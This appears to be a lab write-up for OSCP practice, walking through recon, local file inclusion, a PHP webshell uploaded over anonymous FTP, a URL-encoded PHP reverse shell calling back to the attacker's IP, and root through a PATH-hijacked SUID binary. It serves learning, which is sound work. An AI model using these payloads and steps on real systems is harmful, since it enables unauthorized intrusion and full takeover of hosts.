Box 2/40
My second writeup for OSCP preparation.
RECONNAISSANCE
It is also called Information Gathering Phase. To gather as much information as possible about the target.
I’ll start off by running an nmap scan: nmap -p- -sS -Pn -n -T4 --min-rate=3000 $RHOST. Nmap discovered the following open ports and services:
nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.128.14 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 23:27 EDT
Warning: 192.168.128.14 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.128.14
Host is up (0.24s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 28.35 seconds
Run a comprehensive nmap scan to gather more detailed information about the open ports. It is valuable for an attacker as it provides detailed information on a potential attack vectors into a system.
nmap -p21,22,80 -sC -sV -O -Pn -n 192.168.128.14Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 23:25 EDT
Nmap scan report for 192.168.128.14
Host is up (0.23s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 4.0 (92%), Linux 2.6.18 (91%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds
ENUMERATION
It is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.
PORT 21 — FTP
A vsFTPd 3.0.3 server on port 21 with anonymous access enabled and no interesting or useful file in here. There is no known public vulnerability for this version.
PORT 22 — SSH
Need a valid credentials to connect here.
POR80 — HTTP
Browse to http://192.168.128.14 shows that is an Apache2 Debian Default Page.
Check robots.txt if available, and as shown below that I can’t read robots.txt.
To bypass this restriction, create a custom user agent for the search engine. I used curl to create a user agent and read the robots.txt. As shown below I’m now able to read the disallowed entry as “/secret_informtion/”.
Browse to http://192.168.128.14/secret_information, it brings a web page that describes “DNS Zone Transfer Attack” and the web page contains two hyperlinks “English & Spanish.” As I click one of the hyperlinks, it shows that a parameter lang is used by the web page to locate the resource named en.php on the file system. The parameter is possibly vulnerable to File inclusion vulnerability.
EXPLOITATION
This is where an attacker/pentester breaks or gain access to the system.
File Inclusion Vulnerability are divided into Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI and RFI are vulnerabilities that are often found in poorly-written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.
Local File Inclusion (LFI) vulnerabilities allow an attacker to read and sometimes execute local files on the web server (including log files and configuration files containing password hashes or even clear text passwords). The parameter lang is vulnerable to LFI by entering any valid local file-to-path that abuses the PHP include. I try to get /etc/passwd file by abusing the PHP include of the webpage and as result, I got the whole contents of the /etc/passwd file as shown in the below image.
Remote File Inclusion (RFI) vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker can include files from a remote location. Let’s see if I can include a remote file too on the web page by entering an external URL in the lang parameter.
Host a simple HTTP server and in the lang parameter I tried to browse to my HTTP server, nothing happens it is not vulnerable to RFI.
Since I can access FTP using anonymous login, let’s check if I can read the content of vsftpd config file.
As shown in the config file that the directory of vsftpd is /var/ftp and its write permission is also enabled. I create a malicious PHP webshell.
<?php system($_REQUEST['cmd']) ?>Upload the PHP file in the FTP pub directory.
ftp 192.168.128.14
cd pub
put php-cmd.phpTry if the PHP payload is working. As shown below that I can execute command using the payload.
To gain a remote connection first I will generate a listener.
nc nvlp 80URL Encode the one liner PHP reverse shell payload.
php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27Execute PHP revershell payload.
192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27
Once the exploit is successfully executed, I will receive a reverse shell connection from port 80 as www-data.
PRIVILEGE ESCALATION
It is the process of increasing the level of user privileges on a certain host to the highest permission level.
Upon checking the/home/tom directory, I found an interesting file rootshell.c file and a compile file rootshell that owns SUID permissions.
According to the code, it will execute the whoami file and check if the current user is tom. If the current user is tom it will escalate the privilege into the highest privilege or else it will only print username-id of the current user.
Create a whoami file in /tmp directory abd make it executrable.
echo "printf "tom"" > whoami
chmod +x whoamiChanging the target system path /tmp directory, and check if it is changed.
export PATH=/tmp:$PATH
echo $PATHExecute the rootshell
cd /home/tom
./rootshellOnce the file is successfully executed, I will obtain a root privilege shell.
